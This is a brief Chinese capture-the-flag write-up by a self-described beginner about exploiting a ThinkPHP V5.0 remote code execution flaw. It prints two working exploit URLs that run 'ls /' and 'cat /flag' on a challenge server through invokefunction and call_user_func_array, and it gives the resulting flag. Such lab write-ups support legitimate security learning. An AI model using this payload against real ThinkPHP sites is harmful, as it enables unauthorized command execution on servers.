ThinkPHP V5.0漏洞利用
笔记:作为新手,感觉这些题目真的不友好,看得懂方法,不知道原理,好好学吧!(# ̄~ ̄#)
一、ThinkPHP V5.0漏洞
1、审查源码
首先,我的思路是检查源码和抓包,但是都没有收获
2、ThinkPHP V5.0漏洞利用
1、在没有任何思路的情况下,我把ThinkPHP V5.0粘贴到网页上查看,找到了ThinkPHP V5.0漏洞利用
http://111.200.241.244:57051/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
2、获取flag
http://111.200.241.244:57051/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
flag{thinkphp5_rce}
本文借鉴https://www.cnblogs.com/backlion/p/10106676.html,如有冒犯或错误,请及时告知,Thanks♪(・ω・)ノ!